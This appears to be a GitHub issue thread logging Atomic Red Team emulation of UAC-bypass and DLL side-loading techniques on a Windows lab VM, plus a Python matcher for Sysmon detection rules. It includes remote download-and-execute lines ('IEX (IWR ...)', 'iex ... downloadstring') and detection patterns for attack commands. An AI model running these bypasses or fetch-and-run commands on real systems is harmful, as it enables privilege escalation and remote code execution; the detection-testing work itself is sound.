Done executing cleanup for test: T1548.002-19 WinPwn - UAC Bypass ccmstp technique
Executing cleanup for test: T1548.002-20 WinPwn - UAC Bypass DiskCleanup technique
Done executing cleanup for test: T1548.002-20 WinPwn - UAC Bypass DiskCleanup technique
Executing cleanup for test: T1548.002-21 WinPwn - UAC Bypass DccwBypassUAC technique
Done executing cleanup for test: T1548.002-21 WinPwn - UAC Bypass DccwBypassUAC technique
Executing cleanup for test: T1548.002-22 Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key
Done executing cleanup for test: T1548.002-22 Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key
Executing cleanup for test: T1548.002-23 UAC Bypass with WSReset Registry Modification
Done executing cleanup for test: T1548.002-23 UAC Bypass with WSReset Registry Modification
Executing cleanup for test: T1548.002-24 Disable UAC - Switch to the secure desktop when prompting for elevation via registry key
Done executing cleanup for test: T1548.002-24 Disable UAC - Switch to the secure desktop when prompting for elevation via registry key
Executing cleanup for test: T1548.002-25 Disable UAC notification via registry keys
The operation completed successfully.
Done executing cleanup for test: T1548.002-25 Disable UAC notification via registry keys
Executing cleanup for test: T1548.002-26 Disable ConsentPromptBehaviorAdmin via registry keys
The operation completed successfully.
Done executing cleanup for test: T1548.002-26 Disable ConsentPromptBehaviorAdmin via registry keys
```
Sysmon event log ![T1548](https://github.com/wazuh/wazuh/assets/95248059/e9fc31ff-ac61-48b9-9793-c64ffcec0cdb)
Dashboard event ![Dashboard1548.002-1](https://github.com/wazuh/wazuh/assets/95248059/a4029358-36aa-4efa-8b9f-0ec8d3e6b6c5) ![Dashboard1548.002-2](https://github.com/wazuh/wazuh/assets/95248059/65eb44a6-ef4d-4ad7-bfe9-4a9849885d32)

T1574.002 – Hijack Execution Flow: DLL Side-Loading

GetPrereqs
```console
PS C:\Users\vagrant\Sysmon> Invoke-AtomicTest T1574.002 -GetPrereqs
PathToAtomicsFolder = C:\AtomicRedTeam\atomics
GetPrereq's for: T1574.002-1 DLL Side-Loading using the Notepad++ GUP.exe binary
Attempting to satisfy prereq: Gup.exe binary must exist on disk at specified location (C:\AtomicRedTeam\atomics\T1574.002\bin\GUP.exe)
Prereq already met: Gup.exe binary must exist on disk at specified location (C:\AtomicRedTeam\atomics\T1574.002\bin\GUP.exe)
GetPrereq's for: T1574.002-2 DLL Side-Loading using the dotnet startup hook environment variable
Attempting to satisfy prereq: .Net SDK must be installed
Prereq already met: .Net SDK must be installed
Attempting to satisfy prereq: preloader must exist
Prereq already met: preloader must exist
```
Test run
```console
PS C:\Users\vagrant\Sysmon> Invoke-AtomicTest T1574.002
PathToAtomicsFolder = C:\AtomicRedTeam\atomics
Executing test: T1574.002-1 DLL Side-Loading using the Notepad++ GUP.exe binary
Exit code: -1073741515
Done executing test: T1574.002-1 DLL Side-Loading using the Notepad++ GUP.exe binary
Executing test: T1574.002-2 DLL Side-Loading using the dotnet startup hook environment variable
Unhandled exception. System.ArgumentException: The startup hook simple assembly name '"C:\AtomicRedTeam\atomics\T1574.002\bin\preloader.dll" ' is invalid. It must be a valid assembly name and it may not contain directory separator, space or comma characters and must not end with '.dll'.
   at System.StartupHookProvider.ParseStartupHook(StartupHookNameOrPath& startupHook, String startupHookPart)
   at System.StartupHookProvider.ProcessStartupHooks(String diagnosticStartupHooks)
Exit code: 0
Done executing test: T1574.002-2 DLL Side-Loading using the dotnet startup hook environment variable
```
Cleanup
```console
PS C:\Users\vagrant\Sysmon> Invoke-AtomicTest T1574.002 -Cleanup
PathToAtomicsFolder = C:\AtomicRedTeam\atomics
Executing cleanup for test: T1574.002-1 DLL Side-Loading using the Notepad++ GUP.exe binary
Done executing cleanup for test: T1574.002-1 DLL Side-Loading using the Notepad++ GUP.exe binary
Executing cleanup for test: T1574.002-2 DLL Side-Loading using the dotnet startup hook environment variable
Done executing cleanup for test: T1574.002-2 DLL Side-Loading using the dotnet startup hook environment variable
```
Sysmon event log ![T1574](https://github.com/wazuh/wazuh/assets/95248059/387dc5ba-36d2-4ccb-81fb-bda77172b2a8)
Dashboard event ![Dashboard1574.002-1](https://github.com/wazuh/wazuh/assets/95248059/d6549a3a-8159-4217-8458-613844f0b8ec) ![Dashboard1574.002-2](https://github.com/wazuh/wazuh/assets/95248059/61a9fd9f-654e-43a9-97a6-e9d94aceab13)
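The Sysmon events collected in the runs above (regsvr32 loading a scriptlet, schtasks creating a task, the `ms-settings`/`mscfile`/`Folder` `shell\open\command` registry writes, security-software enumeration, GUP.exe side-loading) are the raw material that the blog post's custom rules match on. The Python below is an added example, not Wazuh's ruleset and not code from this issue: it runs a handful of constructed rules over constructed events shaped like the JSON the Wazuh eventchannel decoder produces for Sysmon (`win.system.eventID`, `win.eventdata.commandLine`, `win.eventdata.targetObject`, `win.eventdata.imageLoaded`; those field names are an assumption), and it includes the regression check the test plan asks for, comparing the rule ID raised per event between two versions. Rule IDs 100101 to 100105 and every regex are hypothetical.

```python
"""Toy Sysmon-to-ATT&CK matcher for the techniques exercised in this test run.

Added example, not Wazuh code. Events are constructed in the shape the Wazuh
eventchannel decoder gives Sysmon records (win.system.eventID, win.eventdata.*);
treat those field names as an assumption. Rule IDs and patterns are hypothetical.
"""
from __future__ import annotations

import re
from dataclasses import dataclass


def _rx(pattern: str) -> re.Pattern:
    return re.compile(pattern, re.IGNORECASE)


@dataclass(frozen=True)
class Rule:
    rule_id: int        # hypothetical ID in the 100000+ range Wazuh documents for custom rules
    technique: str      # ATT&CK technique
    event_id: int       # Sysmon event: 1 process create, 7 image load, 13 registry value set
    conditions: tuple   # ((eventdata field, compiled regex), ...); every pair must match


RULES: tuple[Rule, ...] = (
    # T1218.010: regsvr32 given a scriptlet (/i:) or scrobj.dll
    Rule(100101, "T1218.010", 1, (("image", _rx(r"\\regsvr32\.exe$")),
                                  ("commandLine", _rx(r"/i:|scrobj\.dll")))),
    # T1053.005: schtasks creating a task
    Rule(100102, "T1053.005", 1, (("image", _rx(r"\\schtasks\.exe$")),
                                  ("commandLine", _rx(r"\s/create\b")))),
    # T1548.002: UAC-bypass handler keys written under HKCU\Software\Classes
    Rule(100103, "T1548.002", 13, (("targetObject",
                                    _rx(r"\\Classes\\(ms-settings|mscfile|Folder)\\shell\\open\\command")),)),
    # T1518.001: probing for Sysmon, Defender or firewall state
    Rule(100104, "T1518.001", 1, (("commandLine",
                                   _rx(r"(Get-Service|tasklist|sc(\.exe)? query).*sysmon"
                                       r"|Get-MpComputerStatus|Get-NetFirewallProfile")),)),
    # T1574.002: GUP.exe loading libcurl.dll from anywhere except Program Files
    Rule(100105, "T1574.002", 7, (("image", _rx(r"\\GUP\.exe$")),
                                  ("imageLoaded", _rx(r"^(?!C:\\Program Files).*\\libcurl\.dll$")))),
)


def _ev(event_id: int, **eventdata: str) -> dict:
    """Build one constructed event in the decoded-eventchannel shape."""
    return {"win": {"system": {"eventID": str(event_id)}, "eventdata": eventdata}}


SAMPLE_EVENTS = [  # constructed, mirroring the atomics run above; the last one is benign
    _ev(1, image=r"C:\Windows\System32\regsvr32.exe",
        commandLine=r"regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1218.010\src\RegSvr32.sct scrobj.dll"),
    _ev(1, image=r"C:\Windows\System32\schtasks.exe",
        commandLine=r'schtasks /create /tn "ATOMIC-T1053.005" /tr "cmd /c calc.exe" /sc daily'),
    _ev(13, image=r"C:\Windows\System32\reg.exe",
        targetObject=r"HKU\S-1-5-21-1000-2000-3000-1001\Software\Classes\ms-settings\shell\open\command\DelegateExecute"),
    _ev(1, image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        commandLine="powershell.exe -c \"Get-Service | Where-Object {$_.DisplayName -like '*Sysmon*'}\""),
    _ev(7, image=r"C:\AtomicRedTeam\atomics\T1574.002\bin\GUP.exe",
        imageLoaded=r"C:\AtomicRedTeam\atomics\T1574.002\bin\libcurl.dll"),
    _ev(1, image=r"C:\Windows\System32\notepad.exe", commandLine="notepad.exe"),
]


def match(event: dict) -> list[Rule]:
    """Return every rule whose event ID and all field patterns match the event."""
    win = event.get("win", {})
    try:
        event_id = int(win.get("system", {}).get("eventID"))
    except (TypeError, ValueError):
        return []  # not a Windows eventchannel record
    data = win.get("eventdata", {})
    return [r for r in RULES
            if r.event_id == event_id
            and all(rx.search(str(data.get(field, ""))) for field, rx in r.conditions)]


def alert_ids(events: list[dict]) -> dict[int, int]:
    """Rule ID raised per event index; first match wins, since Wazuh raises a single
    alert per event. Events that match nothing are left out."""
    out: dict[int, int] = {}
    for i, ev in enumerate(events):
        hits = match(ev)
        if hits:
            out[i] = hits[0].rule_id
    return out


def compare_runs(previous: dict, current: dict) -> dict:
    """The regression check from the test plan: the same event must raise the same
    rule ID in the previous and the current release. Returns only the entries that differ."""
    keys = set(previous) | set(current)
    return {k: (previous.get(k), current.get(k)) for k in keys if previous.get(k) != current.get(k)}


if __name__ == "__main__":
    ids = alert_ids(SAMPLE_EVENTS)
    for i, rid in ids.items():
        print(i, rid, next(r.technique for r in RULES if r.rule_id == rid))
    print("drift:", compare_runs(ids, {**ids, 0: 100199}))
```

The negative lookahead on the T1574.002 rule is the kind of exclusion a real rule needs so that Notepad++ loading its own libcurl.dll from its install directory does not fire; the T1548.002 rule deliberately keys on the registry path rather than on the process, because the same key is written by cmd, reg.exe and PowerShell in the tests above.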
LucioDonda commented 6 months ago

~~While working on the issue I faced a problem with Vagrant, after which I couldn't finish the procedure. While working on a solution I'm asking for AWS instances.~~

Found a way of continuing through the VirtualBox machines; will continue that way.

LucioDonda commented 6 months ago

Emulation of ATT&CK techniques and detection with Wazuh 🟒

Setting up the environment [Agent server 2022] 🟒

Sysmon configuration

Mapping Sysmon rules with MITRE attack techniques
```console
PS C:\Users\vagrant\Desktop\Sysmon> .\Sysmon.exe -accepteula -i sysmonconfig.xml

System Monitor v15.14 - System activity monitor
By Mark Russinovich and Thomas Garnier
Copyright (C) 2014-2024 Microsoft Corporation
Using libxml2. libxml2 is Copyright (C) 1998-2012 Daniel Veillard. All Rights Reserved.
Sysinternals - www.sysinternals.com

Loading configuration file with schema version 4.60
Sysmon schema version: 4.90
Configuration file validated.
Sysmon installed.
SysmonDrv installed.
Starting SysmonDrv.
SysmonDrv started.
Starting Sysmon..
Sysmon started.
```

Capture Sysmon

Modify ossec.conf

```xml
<localfile>
  <location>Microsoft-Windows-Sysmon/Operational</location>
  <log_format>eventchannel</log_format>
</localfile>
```

Setting up the environment [windows server 2022] 🟒

ART Execution Framework and Atomics folder installation
```console
PS C:\Users\vagrant\Desktop\Sysmon> IEX (IWR 'https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1' -UseBasicParsing);
PS C:\Users\vagrant\Desktop\Sysmon> Install-AtomicRedTeam -getAtomics
Installation of Invoke-AtomicRedTeam is complete. You can now use the Invoke-AtomicTest function
See Wiki at https://github.com/redcanaryco/invoke-atomicredteam/wiki for complete details
```
Importing the ART module
```console
PS C:\Users\vagrant\Desktop\Sysmon> Import-Module "C:\AtomicRedTeam\invoke-atomicredteam\Invoke-AtomicRedTeam.psd1" -Force
```
Get details of a particular technique
```console
PS C:\Users\vagrant\Desktop\Sysmon> Invoke-AtomicTest T1548.002 -ShowDetailsBrief
PathToAtomicsFolder = C:\AtomicRedTeam\atomics
T1548.002-1 Bypass UAC using Event Viewer (cmd)
T1548.002-2 Bypass UAC using Event Viewer (PowerShell)
T1548.002-3 Bypass UAC using Fodhelper
T1548.002-4 Bypass UAC using Fodhelper - PowerShell
T1548.002-5 Bypass UAC using ComputerDefaults (PowerShell)
T1548.002-6 Bypass UAC by Mocking Trusted Directories
T1548.002-7 Bypass UAC using sdclt DelegateExecute
T1548.002-8 Disable UAC using reg.exe
T1548.002-9 Bypass UAC using SilentCleanup task
T1548.002-10 UACME Bypass Method 23
T1548.002-11 UACME Bypass Method 31
T1548.002-12 UACME Bypass Method 33
T1548.002-13 UACME Bypass Method 34
T1548.002-14 UACME Bypass Method 39
T1548.002-15 UACME Bypass Method 56
T1548.002-16 UACME Bypass Method 59
T1548.002-17 UACME Bypass Method 61
T1548.002-18 WinPwn - UAC Magic
T1548.002-19 WinPwn - UAC Bypass ccmstp technique
T1548.002-20 WinPwn - UAC Bypass DiskCleanup technique
T1548.002-21 WinPwn - UAC Bypass DccwBypassUAC technique
T1548.002-22 Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key
T1548.002-23 UAC Bypass with WSReset Registry Modification
T1548.002-24 Disable UAC - Switch to the secure desktop when prompting for elevation via registry key
T1548.002-25 Disable UAC notification via registry keys
T1548.002-26 Disable ConsentPromptBehaviorAdmin via registry keys
```
Check/Get prerequisites of a technique

```console
PS C:\Users\vagrant\Desktop\Sysmon> Invoke-AtomicTest T1548.002 -CheckPrereqs
PathToAtomicsFolder = C:\AtomicRedTeam\atomics
CheckPrereq's for: T1548.002-1 Bypass UAC using Event Viewer (cmd)
Prerequisites met: T1548.002-1 Bypass UAC using Event Viewer (cmd)
CheckPrereq's for: T1548.002-2 Bypass UAC using Event Viewer (PowerShell)
Prerequisites met: T1548.002-2 Bypass UAC using Event Viewer (PowerShell)
CheckPrereq's for: T1548.002-3 Bypass UAC using Fodhelper
Prerequisites met: T1548.002-3 Bypass UAC using Fodhelper
CheckPrereq's for: T1548.002-4 Bypass UAC using Fodhelper - PowerShell
Prerequisites met: T1548.002-4 Bypass UAC using Fodhelper - PowerShell
CheckPrereq's for: T1548.002-5 Bypass UAC using ComputerDefaults (PowerShell)
Prerequisites met: T1548.002-5 Bypass UAC using ComputerDefaults (PowerShell)
CheckPrereq's for: T1548.002-6 Bypass UAC by Mocking Trusted Directories
Prerequisites met: T1548.002-6 Bypass UAC by Mocking Trusted Directories
CheckPrereq's for: T1548.002-7 Bypass UAC using sdclt DelegateExecute
Prerequisites met: T1548.002-7 Bypass UAC using sdclt DelegateExecute
CheckPrereq's for: T1548.002-8 Disable UAC using reg.exe
Prerequisites met: T1548.002-8 Disable UAC using reg.exe
CheckPrereq's for: T1548.002-9 Bypass UAC using SilentCleanup task
Prerequisites met: T1548.002-9 Bypass UAC using SilentCleanup task
CheckPrereq's for: T1548.002-10 UACME Bypass Method 23
Prerequisites not met: T1548.002-10 UACME Bypass Method 23
[*] UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\23 Akagi64.exe")
Try installing prereq's with the -GetPrereqs switch
CheckPrereq's for: T1548.002-11 UACME Bypass Method 31
Prerequisites not met: T1548.002-11 UACME Bypass Method 31
[*] UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\31 Akagi64.exe")
Try installing prereq's with the -GetPrereqs switch
CheckPrereq's for: T1548.002-12 UACME Bypass Method 33
Prerequisites not met: T1548.002-12 UACME Bypass Method 33
[*] UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\33 Akagi64.exe")
Try installing prereq's with the -GetPrereqs switch
CheckPrereq's for: T1548.002-13 UACME Bypass Method 34
Prerequisites not met: T1548.002-13 UACME Bypass Method 34
[*] UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\34 Akagi64.exe")
Try installing prereq's with the -GetPrereqs switch
CheckPrereq's for: T1548.002-14 UACME Bypass Method 39
Prerequisites not met: T1548.002-14 UACME Bypass Method 39
[*] UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\39 Akagi64.exe")
Try installing prereq's with the -GetPrereqs switch
CheckPrereq's for: T1548.002-15 UACME Bypass Method 56
Prerequisites not met: T1548.002-15 UACME Bypass Method 56
[*] UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\56 Akagi64.exe")
Try installing prereq's with the -GetPrereqs switch
CheckPrereq's for: T1548.002-16 UACME Bypass Method 59
Prerequisites not met: T1548.002-16 UACME Bypass Method 59
[*] UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\59 Akagi64.exe")
Try installing prereq's with the -GetPrereqs switch
CheckPrereq's for: T1548.002-17 UACME Bypass Method 61
Prerequisites not met: T1548.002-17 UACME Bypass Method 61
[*] UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\61 Akagi64.exe")
Try installing prereq's with the -GetPrereqs switch
CheckPrereq's for: T1548.002-18 WinPwn - UAC Magic
Prerequisites met: T1548.002-18 WinPwn - UAC Magic
CheckPrereq's for: T1548.002-19 WinPwn - UAC Bypass ccmstp technique
Prerequisites met: T1548.002-19 WinPwn - UAC Bypass ccmstp technique
CheckPrereq's for: T1548.002-20 WinPwn - UAC Bypass DiskCleanup technique
Prerequisites met: T1548.002-20 WinPwn - UAC Bypass DiskCleanup technique
CheckPrereq's for: T1548.002-21 WinPwn - UAC Bypass DccwBypassUAC technique
Prerequisites met: T1548.002-21 WinPwn - UAC Bypass DccwBypassUAC technique
CheckPrereq's for: T1548.002-22 Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key
Prerequisites met: T1548.002-22 Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key
CheckPrereq's for: T1548.002-23 UAC Bypass with WSReset Registry Modification
Prerequisites met: T1548.002-23 UAC Bypass with WSReset Registry Modification
CheckPrereq's for: T1548.002-24 Disable UAC - Switch to the secure desktop when prompting for elevation via registry key
Prerequisites met: T1548.002-24 Disable UAC - Switch to the secure desktop when prompting for elevation via registry key
CheckPrereq's for: T1548.002-25 Disable UAC notification via registry keys
Prerequisites met: T1548.002-25 Disable UAC notification via registry keys
CheckPrereq's for: T1548.002-26 Disable ConsentPromptBehaviorAdmin via registry keys
Prerequisites met: T1548.002-26 Disable ConsentPromptBehaviorAdmin via registry keys

PS C:\Users\vagrant\Desktop\Sysmon> Invoke-AtomicTest T1548.002 -GetPrereqs
PathToAtomicsFolder=C:\AtomicRedTeam\atomics
GetPrereq's for: T1548.002-1 Bypass UAC using Event Viewer (cmd)
No Preqs Defined
GetPrereq's for: T1548.002-2 Bypass UAC using Event Viewer (PowerShell)
No Preqs Defined
GetPrereq's for: T1548.002-3 Bypass UAC using Fodhelper
No Preqs Defined
GetPrereq's for: T1548.002-4 Bypass UAC using Fodhelper - PowerShell
No Preqs Defined
GetPrereq's for: T1548.002-5 Bypass UAC using ComputerDefaults (PowerShell)
No Preqs Defined
GetPrereq's for: T1548.002-6 Bypass UAC by Mocking Trusted Directories
No Preqs Defined
GetPrereq's for: T1548.002-7 Bypass UAC using sdclt DelegateExecute
No Preqs Defined
GetPrereq's for: T1548.002-8 Disable UAC using reg.exe
No Preqs Defined
GetPrereq's for: T1548.002-9 Bypass UAC using SilentCleanup task
No Preqs Defined
GetPrereq's for: T1548.002-10 UACME Bypass Method 23
Attempting to satisfy prereq: UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\23 Akagi64.exe")
Prereq successfully met: UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\23 Akagi64.exe")
GetPrereq's for: T1548.002-11 UACME Bypass Method 31
Attempting to satisfy prereq: UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\31 Akagi64.exe")
Prereq already met: UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\31 Akagi64.exe")
GetPrereq's for: T1548.002-12 UACME Bypass Method 33
Attempting to satisfy prereq: UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\33 Akagi64.exe")
Prereq already met: UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\33 Akagi64.exe")
GetPrereq's for: T1548.002-13 UACME Bypass Method 34
Attempting to satisfy prereq: UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\34 Akagi64.exe")
Prereq already met: UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\34 Akagi64.exe")
GetPrereq's for: T1548.002-14 UACME Bypass Method 39
Attempting to satisfy prereq: UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\39 Akagi64.exe")
Prereq already met: UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\39 Akagi64.exe")
GetPrereq's for: T1548.002-15 UACME Bypass Method 56
Attempting to satisfy prereq: UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\56 Akagi64.exe")
Prereq already met: UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\56 Akagi64.exe")
GetPrereq's for: T1548.002-16 UACME Bypass Method 59
Attempting to satisfy prereq: UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\59 Akagi64.exe")
Prereq already met: UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\59 Akagi64.exe")
GetPrereq's for: T1548.002-17 UACME Bypass Method 61
Attempting to satisfy prereq: UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\61 Akagi64.exe")
Prereq already met: UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\61 Akagi64.exe")
GetPrereq's for: T1548.002-18 WinPwn - UAC Magic
No Preqs Defined
GetPrereq's for: T1548.002-19 WinPwn - UAC Bypass ccmstp technique
No Preqs Defined
GetPrereq's for: T1548.002-20 WinPwn - UAC Bypass DiskCleanup technique
No Preqs Defined
GetPrereq's for: T1548.002-21 WinPwn - UAC Bypass DccwBypassUAC technique
No Preqs Defined
GetPrereq's for: T1548.002-22 Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key
No Preqs Defined
GetPrereq's for: T1548.002-23 UAC Bypass with WSReset Registry Modification
No Preqs Defined
GetPrereq's for: T1548.002-24 Disable UAC - Switch to the secure desktop when prompting for elevation via registry key
No Preqs Defined
GetPrereq's for: T1548.002-25 Disable UAC notification via registry keys
No Preqs Defined
GetPrereq's for: T1548.002-26 Disable ConsentPromptBehaviorAdmin via registry keys
No Preqs Defined
```
Run the test for a particular technique

```console
PS C:\Users\vagrant\Desktop\Sysmon> Invoke-AtomicTest T1548.002
PathToAtomicsFolder = C:\AtomicRedTeam\atomics
Executing test: T1548.002-1 Bypass UAC using Event Viewer (cmd)
Process Timed out after 120 seconds, use '-TimeoutSeconds' to specify a different timeout
The operation completed successfully.
Microsoft Windows [Version 10.0.20348.2322]
(c) Microsoft Corporation. All rights reserved.

C:\Users\vagrant\AppData\Local\Temp\1>
Exit code: 0
Done executing test: T1548.002-1 Bypass UAC using Event Viewer (cmd)
Executing test: T1548.002-2 Bypass UAC using Event Viewer (PowerShell)

    Hive: HKEY_CURRENT_USER\software\classes\mscfile\shell\open

Name Property
---- -----
command

Exit code: 0
Done executing test: T1548.002-2 Bypass UAC using Event Viewer (PowerShell)
Executing test: T1548.002-3 Bypass UAC using Fodhelper
Exception calling "Start" with "0" argument(s): "Access is denied"
At C:\AtomicRedTeam\invoke-atomicredteam\Private\Invoke-Process.ps1:45 char:17
+ $process.Start() > $null
+ ~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : Win32Exception
Exit code:
Done executing test: T1548.002-3 Bypass UAC using Fodhelper
Executing test: T1548.002-4 Bypass UAC using Fodhelper - PowerShell

    Hive: HKEY_CURRENT_USER\software\classes\ms-settings\shell\open

Name Property
---- --------
command DelegateExecute :
PSPath       : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\software\classes\ms-settings\shell\open\command
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\software\classes\ms-settings\shell\open
PSChildName  : command
PSDrive      : HKCU
PSProvider   : Microsoft.PowerShell.Core\Registry

Exit code: 0
Done executing test: T1548.002-4 Bypass UAC using Fodhelper - PowerShell
Executing test: T1548.002-5 Bypass UAC using ComputerDefaults (PowerShell)

    Hive: HKEY_CURRENT_USER\software\classes\ms-settings\shell\open

Name Property
---- --------
command DelegateExecute :
PSPath       : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\software\classes\ms-settings\shell\open\command
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\software\classes\ms-settings\shell\open
PSChildName  : command
PSDrive      : HKCU
PSProvider   : Microsoft.PowerShell.Core\Registry

Exit code: 0
Done executing test: T1548.002-5 Bypass UAC using ComputerDefaults (PowerShell)
Executing test: T1548.002-6 Bypass UAC by Mocking Trusted Directories
        1 file(s) copied.
symbolic link created for c:\testbypass.exe <<===>> \\?\C:\Windows \System32\mmc.exe
Exit code: 0
Done executing test: T1548.002-6 Bypass UAC by Mocking Trusted Directories
Executing test: T1548.002-7 Bypass UAC using sdclt DelegateExecute
Exit code: 0
Done executing test: T1548.002-7 Bypass UAC using sdclt DelegateExecute
Executing test: T1548.002-8 Disable UAC using reg.exe
The operation completed successfully.
Exit code: 0
Done executing test: T1548.002-8 Disable UAC using reg.exe
Executing test: T1548.002-9 Bypass UAC using SilentCleanup task
The screen cannot be set to the number of lines and columns specified.
The operation completed successfully.
Access is denied.
Exit code: 0
Done executing test: T1548.002-9 Bypass UAC using SilentCleanup task
Executing test: T1548.002-10 UACME Bypass Method 23
Exit code: 1073741845
Done executing test: T1548.002-10 UACME Bypass Method 23
Executing test: T1548.002-11 UACME Bypass Method 31
Exit code: 1073741845
Done executing test: T1548.002-11 UACME Bypass Method 31
Executing test: T1548.002-12 UACME Bypass Method 33
Exit code: 1073741845
Done executing test: T1548.002-12 UACME Bypass Method 33
Executing test: T1548.002-13 UACME Bypass Method 34
Exit code: 1073741845
Done executing test: T1548.002-13 UACME Bypass Method 34
Executing test: T1548.002-14 UACME Bypass Method 39
Exit code: 1073741845
Done executing test: T1548.002-14 UACME Bypass Method 39
Executing test: T1548.002-15 UACME Bypass Method 56
Exit code: 1073741845
Done executing test: T1548.002-15 UACME Bypass Method 56
Executing test: T1548.002-16 UACME Bypass Method 59
Exit code: 1073741845
Done executing test: T1548.002-16 UACME Bypass Method 59
Executing test: T1548.002-17 UACME Bypass Method 61
Exit code: 1073741845
Done executing test: T1548.002-17 UACME Bypass Method 61
Executing test: T1548.002-18 WinPwn - UAC Magic
iex : At line:1 char:1
+ # Global TLS Setting for all functions. If TLS12 isn't suppported yo ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software.
At line:2 char:1
+ iex(new-object net.webclient).downloadstring('https://raw.githubuserc ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ParserError: (:) [Invoke-Expression], ParseException
    + FullyQualifiedErrorId : ScriptContainedMaliciousContent,Microsoft.PowerShell.Commands.InvokeExpressionCommand
UACBypass : The term 'UACBypass' is not recognized as the name of a cmdlet, function, script file, or operable program.
Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:3 char:1
+ UACBypass -noninteractive -command "C:\windows\system32\cmd.exe" -tec ...
+ ~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (UACBypass:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException
Exit code: 0
Done executing test: T1548.002-18 WinPwn - UAC Magic
Executing test: T1548.002-19 WinPwn - UAC Bypass ccmstp technique
iex : At line:1 char:1
+ # Global TLS Setting for all functions. If TLS12 isn't suppported yo ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software.
At line:2 char:1
+ iex(new-object net.webclient).downloadstring('https://raw.githubuserc ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ParserError: (:) [Invoke-Expression], ParseException
    + FullyQualifiedErrorId : ScriptContainedMaliciousContent,Microsoft.PowerShell.Commands.InvokeExpressionCommand
UACBypass : The term 'UACBypass' is not recognized as the name of a cmdlet, function, script file, or operable program.
Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:3 char:1
+ UACBypass -noninteractive -command "C:\windows\system32\calc.exe" -te ...
+ ~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (UACBypass:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException
Exit code: 0
Done executing test: T1548.002-19 WinPwn - UAC Bypass ccmstp technique
Executing test: T1548.002-20 WinPwn - UAC Bypass DiskCleanup technique
iex : At line:1 char:1
+ # Global TLS Setting for all functions. If TLS12 isn't suppported yo ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software.
At line:2 char:1
+ iex(new-object net.webclient).downloadstring('https://raw.githubuserc ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ParserError: (:) [Invoke-Expression], ParseException
    + FullyQualifiedErrorId : ScriptContainedMaliciousContent,Microsoft.PowerShell.Commands.InvokeExpressionCommand
